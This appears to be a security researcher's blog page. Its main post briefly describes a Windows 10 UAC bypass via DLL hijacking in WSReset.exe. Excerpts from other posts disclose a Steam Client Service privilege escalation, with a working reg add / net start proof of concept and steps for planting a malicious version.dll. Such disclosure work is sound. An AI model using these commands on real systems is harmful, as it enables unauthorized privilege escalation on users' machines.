Skip to main content

Windows 10 LPE (UAC Bypass) in Windows Store (WSReset.exe)

         
       I found one interesting post in medium which is  here  and i got some idea to bypass UAC . 
And I notice windows store (wsrest.exe) which is enable access by user.  


and I copied it to Desktop and I check it at the process monitor .  I found some missing dll in that . 

Then, I start try to inject and Compile with above technique .  And I'm also wrote the exploit code in C .  




g0ttcha !!!  

Thanks for reading .


Comments

Post a Comment

Popular posts from this blog

local privilege escalation via steam client service

0day on steam

Steam Client Service can be started/stopped with user access and also "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" is full control for the Users group. So , attacker can add reg key to get privilege access.

POC: 
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "C:\windows\system32\cmd.exe /c echo pwned > C:\0day.txt"
net start "Steam Client Service"



And also default installation path is full access for user groups. So,
version.dll which is loaded by steam client service that doesn't exist can be hijacked by transferring malicious dll file rename as version.dll to steam installation path ( C:\Program Files (x86)\Steam\bin ) .



Dll Search Order Hijacking



version.dll name not found in process monitor. So copy malicious dll to installation bin path rename as version.dll . And reg key add to value as  "C:\Program Files (x86)\Steam\bin\SteamService.exe /RunAsService"

POC:…

Privilege Escalation via Dll Hijacking in Steam Client Service

I've discovered the Dll Hijacking vulnerabilities of Steam Client Service. It loads (at least) version.dll from its application directory which is C:\Program Files (x86)\Steam .



Affect *.exe ,
steam.exe
steamerrorreporter64.exe
WriteMiniDump.exe
dota2.exe
steamservice.exe ( privilege escalation )
and some of other exe which have been installed by steam client. Affect dll ,
VERSION.dll
and other dll . Note: steamservice.exe can get privilege escalation access if the user is UAC disable . Impact : 
This occurs when an application fails to resolve a DLL because the DLL does not exist in the specified path or search directories. If this happens, a malicious Dll with the same name can be placed in the specified path directory leading to remote code execution. Let’s assume that the real dll contains a function called somefunc . The attacker could have written a function with the same name, but made it do something quite different such as deleting a file or modifying registry settings. The…